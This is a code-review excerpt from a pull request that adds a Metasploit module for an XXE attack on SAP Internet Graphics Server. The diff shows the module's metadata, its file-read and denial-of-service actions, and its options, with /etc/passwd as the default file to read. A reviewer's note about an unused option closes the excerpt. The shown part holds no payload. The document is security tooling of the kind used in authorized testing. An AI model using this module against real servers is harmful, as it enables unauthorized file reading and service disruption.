modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'SAP Internet Graphics Server (IGS) XXE',
+          'Description' => %q{
+            This module implements the SAP Internet Graphics Server (IGS) XXE attack.
+            An unauthenticated attacker can remotely read files in the server's file system, for example: /etc/passwd
+            Vulnerable SAP IGS versions: 7.20, 7.20EXT, 7.45, 7.49, 7.53
+          },
+          'Author' => [
+            'Yvan Genuer', # @_1ggy The Security Researcher who originally found the vulnerability
+            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            [ 'CVE', '2018-2392' ],
+            [ 'CVE', '2018-2393' ],
+            [ 'URL', 'https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf' ]
+          ],
+          'Actions' => [
+            [ 'READ', { 'Description' => 'Remote file read' } ],
+            [ 'DOS', { 'Description' => 'Denial Of Service' } ]
+          ],
+          'DefaultAction' => 'READ',
+          'DisclosureDate' => '2018-03-14'
+        )
+    )
+    register_options(
+      [
+        Opt::RPORT(40080),
+        OptString.new('FILE', [ true, 'File to read from the remote server', '/etc/passwd']),
+        OptString.new('URN', [ false, 'SAP IGS XMLCHART URN', '/XMLCHART']),
+        OptBool.new('SHOW', [false, 'Show remote file content', true])
```

Comment:
As per the comment above, this option is registered but it is never utilized. Please remove it unless you plan to add in the corresponding functionality.

Reply:
This will be resolved in the next commit, feel free to reopen this if you add in the functionality.